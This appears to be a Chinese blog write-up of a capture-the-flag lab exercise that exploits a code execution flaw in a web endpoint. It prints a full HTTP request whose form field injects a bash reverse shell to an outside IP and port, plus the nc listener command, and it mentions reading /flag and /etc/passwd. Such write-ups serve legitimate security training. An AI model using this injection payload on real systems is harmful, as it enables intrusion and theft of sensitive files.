1.阅读靶场介绍
这里我们可以得到的有用信息就是
存在任意代码执行漏洞
这里博主提前剧透一下
博主是post一个报文,然后反弹shell去cat /flag
带着思路我们直接进入靶场
2.启动靶场
我们会得到如下页面
这个页面博主试过弱密码/空口令/爆破等等最后发现没有成功
于是直接bp抓包,然后发送报文
这里各位要去修改host和请求体的内容(ip/port这两个参数)
POST /system/datarec.php HTTP/2 Host: eci-2ze7xarqd63euoeunmxj.cloudeci1.ichunqiu.com:80 Content-Length: 75 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://eci-2ze3es0hytbdktzuz9xu.cloudeci1.ichunqiu.com/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8 Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1666320065,1666528495,1666591607; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1666604245 r_name=$(bash+-c+'bash+-i+>%26+/dev/tcp/152.136.201.53/7777+0<%261+2>%261')我们要开启nc -lvvp 7777先
然后就发送报文就会收到反弹shell了
接着就是去cat /flag一般来说我们都是去读取cat /etc/passwd
读取一些密码信息的(敏感文件)
就可以去复现这个漏洞了
到此文章又接近尾声了
感谢你们宝贵的时间